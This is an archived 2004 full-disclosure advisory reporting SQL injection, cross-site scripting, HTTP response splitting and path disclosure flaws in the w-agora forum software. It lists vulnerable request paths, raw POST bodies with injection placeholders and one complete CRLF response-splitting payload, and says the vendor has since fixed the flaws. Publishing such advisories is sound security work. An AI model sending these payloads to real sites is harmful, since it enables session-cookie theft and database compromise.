[Full-Disclosure] Multiple vulnerabilities in w-agora forum

From: Alexander Antipov (antipov_at_SecurityLab.ru)
Date: 09/30/04

  • Next message: idlabs-advisories_at_idefense.com: "[Full-Disclosure] iDEFENSE Security Advisory 09.30.04: Samba Arbitrary File Access Vulnerability" 
    To: <full-disclosure@lists.netsys.com>
Date: Thu, 30 Sep 2004 12:41:17 +0400

    http://www.maxpatrol.com/mp_advisory.asp

    Title: Multiple vulnerabilities in w-agora forum
    Date: 28.09.04
    Severity: Medium
    Application: w-agora 4.1.6a, http://www.w-agora/en/download.php
    Platform: PHP

     I. DESCRIPTION

     Multiple vulnerabilities were found in w-agora forum. A remote user
     can conduct SQL injection attack, HTTP response splitting and Cross
    site
     Scripting attack.

     1. SQL injection

    redir_url.php?bn=demos_links&key=[SQL]

     2. XSS in GET:

    download_thread.php?site=support&bn=support_install&thread=[XSS
     code here]

     3. XSS in POST:

     POST /login.php HTTP/1.1
     Host: w-agora
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 89
     loginform=1&redirect_url=1&loginuser=[XSS code here]&loginpassword=1

      POST /forgot_password.php HTTP/1.1
     Host: w-agora
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 48
     go=1&userid=[XSS code here]

     4. HTTP response splitting

    /subscribe_thread.php?site=support&bn=support_in

    stall&thread=%0d%0aContent-Length:%200%0d%0a%0d%0a%20200%20OK%0d%0aConte
    nt-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a%0d%0a%3chtml%3eScan
    ned%20by%20PTsecurity%3c/html%3e%0d%0a

    5. Path discourse
    /list.php?bn=support_install&last=19&collapse=|id|

    II. IMPACT

    ----------
    A remote user can access the target user's cookies (including
    authentication cookies).
    A remote user can cause SQL commands to be executed by the underlying
    database.

    III. SOLUTION

    -------------
    Yes

    IV. VENDOR FIX/RESPONSE

    -----------------------

    Yes, Fixed in CVS : subscribe_thread.php3,v 1.17, forgot_password.php3
    v1.17, include/auth.php v1.45, list.php3 v1.53,

     V. CREDIT

    -------------

     This vulnerability was discovered by Positive Technologies using
    MaxPatrol (www.maxpatrol.com) - intellectual professional security
    scanner. It is able to detect a substantial amount of vulnerabilities
    not published yet. MaxPatrol's intelligent algorithms are also capable
    to detect a lot of vulnerabilities in custom web-scripts (XSS, SQL and
    code injections, HTTP Response splitting and other).

    ###########################################

    This message has been scanned by F-Secure Anti-Virus for Microsoft
    Exchange.
    For more information, connect to http://www.F-Secure.com/

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

  • Next message: idlabs-advisories_at_idefense.com: "[Full-Disclosure] iDEFENSE Security Advisory 09.30.04: Samba Arbitrary File Access Vulnerability"

    Relevant Pages

    • Multiple vulnerabilities in w-agora forum
      ... Multiple vulnerabilities in w-agora forum ... Multiple vulnerabilities were found in w-agora forum. ... can conduct SQL injection attack, ... A remote user can access the target user's cookies (including ...
      (Bugtraq)
    • [Full-Disclosure] Multiple vulnerabilities in w-agora forum
      ... Multiple vulnerabilities in w-agora forum ... Multiple vulnerabilities were found in w-agora forum. ... can conduct SQL injection attack, ... A remote user can access the target user's cookies (including ...
      (Full-Disclosure)
    • Multiple vulnerabilities in w-agora forum
      ... Multiple vulnerabilities in w-agora forum ... Multiple vulnerabilities were found in w-agora forum. ... can conduct SQL injection attack, ... A remote user can access the target user's cookies (including ...
      (Full-Disclosure)
    • [Full-Disclosure] Multiple vulnerabilities in w-agora forum
      ... Multiple vulnerabilities in w-agora forum ... Multiple vulnerabilities were found in w-agora forum. ... can conduct SQL injection attack, ... A remote user can access the target user's cookies (including ...
      (Full-Disclosure)